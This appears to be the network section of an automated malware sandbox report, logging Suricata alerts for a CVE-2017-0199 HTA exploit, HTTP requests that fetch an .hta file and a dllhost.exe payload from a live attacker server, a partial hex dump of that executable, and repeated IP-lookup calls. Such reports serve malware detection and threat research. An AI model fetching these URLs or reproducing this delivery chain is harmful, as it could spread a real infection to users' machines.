            Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.245.123.6:80 -> 192.168.2.22:49166
            Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.245.123.6:80 -> 192.168.2.22:49164
            Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49172 -> 172.245.123.6:80
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 08:12:30 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Mon, 30 Sep 2024 05:51:09 GMTETag: "fb241-6234fca9f391a"Accept-Ranges: bytesContent-Length: 1028673Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/lnkData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2d 82 c1 ed 69 e3 af be 69 e3 af be 69 e3 af be d4 ac 39 be 6b e3 af be 60 9b 3a be 77 e3 af be 60 9b 2c be db e3 af be 60 9b 2b be 50 e3 af be 4e 25 c2 be 63 e3 af be 4e 25 d4 be 48 e3 af be 69 e3 ae be 64 e1 af be 60 9b 20 be 2f e3 af be 77 b1 3a be 6b e3 af be 77 b1 3b be 68 e3 af be 69 e3 38 be 68 e3 af be 60 9b 3e be 68 e3 af be 52 69 63 68 69 e3 af be 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 87 cf 93 4b 00 00 00 00 00 00 00 00 e0 00 23 01 0b 01 09 00 00 02 08 00 00 d6 01 00 00 00 00 00 10 63 01 00 00 10 00 00 00 20 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 0b 00 00 04 00 00 35 21 0a 00 02 00 00 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c cd 08 00 54 01 00 00 00 b0 0a 00 98 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 40 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 00 08 00 00 10 00 00 00 02 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5c d9 00 00 00 20 08 00 00 da 00 00 00 06 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 a5 01 00 00 00 09 00 00 68 00 00 00 e0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 92 00 00 00 b0 0a 00 00 94 00 00 00 48 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: checkip.dyndns.org
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49176 -> 132.226.8.169:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49178 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49187 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49191 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.22:49173 -> 193.122.130.0:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49179 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49175 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49200 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49190 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49188 -> 188.114.96.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.22:49196 -> 188.114.97.3:443
            Source: global trafficHTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.6Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 172.245.123.6If-Range: "1ceb0-6234c398c9718"
            Source: global trafficHTTP traffic detected: GET /770/dllhost.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.6Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 30 Sep 2024 01:35:50 GMTConnection: Keep-AliveHost: 172.245.123.6If-None-Match: "1ceb0-6234c398c9718"
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49174 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49189 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899A7018 URLDownloadToFileW,7_2_000007FE899A7018
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF73AEE2.emfJump to behavior
            Source: global trafficHTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /cIP5a8 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.6Connection: Keep-Alive
